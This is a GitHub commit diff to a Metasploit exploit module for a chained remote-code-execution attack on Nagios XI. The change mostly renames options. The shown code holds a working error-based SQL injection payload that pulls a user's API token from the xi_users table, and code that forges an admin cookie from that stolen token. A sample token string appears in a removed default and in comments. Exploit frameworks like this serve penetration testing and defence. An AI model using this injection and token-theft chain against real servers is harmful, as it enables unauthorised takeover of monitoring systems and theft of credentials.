Skip to content

Commit 3e8cdd1

Browse files
wvuwvu
committed
Polish up USER_ID and API_TOKEN options
1 parent 9d2355d commit 3e8cdd1

File tree

1 file changed

+14
-10
lines changed

1 file changed

+14
-10
lines changed

modules/exploits/linux/http/nagios_xi_chained_rce.rb

Lines changed: 14 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -44,10 +44,11 @@ def initialize(info = {})
4444
'LHOST' => Rex::Socket.source_address
4545
}
4646
))
47+
4748
register_options([
48-
OptInt.new('USERID', [ true, 'User ID in the database to target', 1 ]),
49-
OptString.new('APITOKEN', [ false, 'If an API Token was already stolen, skip the sqli', '8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6gm' ])
50-
], self.class)
49+
OptInt.new('USER_ID', [true, 'User ID in the database to target', 1]),
50+
OptString.new('API_TOKEN', [false, 'If an API token was already stolen, skip the SQLi'])
51+
])
5152
end
5253

5354
def check
@@ -73,8 +74,8 @@ def exploit
7374
fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!')
7475
end
7576

76-
unless datastore['APITOKEN'].empty?
77-
@api_token = datastore['APITOKEN']
77+
if datastore['API_TOKEN']
78+
@api_token = datastore['API_TOKEN']
7879
else
7980
print_status('Getting API token')
8081
get_api_token
@@ -125,15 +126,17 @@ def get_api_token
125126
'vars_get' => {
126127
'mode' => 'resolve',
127128
'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \
128-
"SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USERID']}" \
129+
"SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USER_ID']}" \
129130
'),FLOOR(RAND(0)*2))x ' \
130131
'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '
131132
}
132133
)
134+
135+
# default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu
136+
# any other user has a longer token, but we cant strip the last char off.
137+
# example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
133138
if res && res.body =~ /Duplicate entry '(.*?).'/
134-
if $1.length > 8 # default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu
135-
# any other user has a longer token, but we cant strip the last char off.
136-
# example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
139+
if $1.length > 8
137140
res.body =~ /Duplicate entry '(.*?)'/
138141
end
139142
@api_token = $1
@@ -148,10 +151,11 @@ def get_admin_cookie
148151
'method' => 'GET',
149152
'uri' => '/nagiosxi/rr.php',
150153
'vars_get' => {
151-
'uid' => "#{datastore['USERID']}-#{Rex::Text.rand_text_alpha(8)}-" +
154+
'uid' => "#{datastore['USER_ID']}-#{Rex::Text.rand_text_alpha(8)}-" +
152155
Digest::MD5.hexdigest(@api_token)
153156
}
154157
)
158+
155159
if res && (@admin_cookie = res.get_cookies.split('; ').last)
156160
vprint_good("Admin cookie: #{@admin_cookie}")
157161
get_csrf_token(res.body)

0 commit comments

Comments
 (0)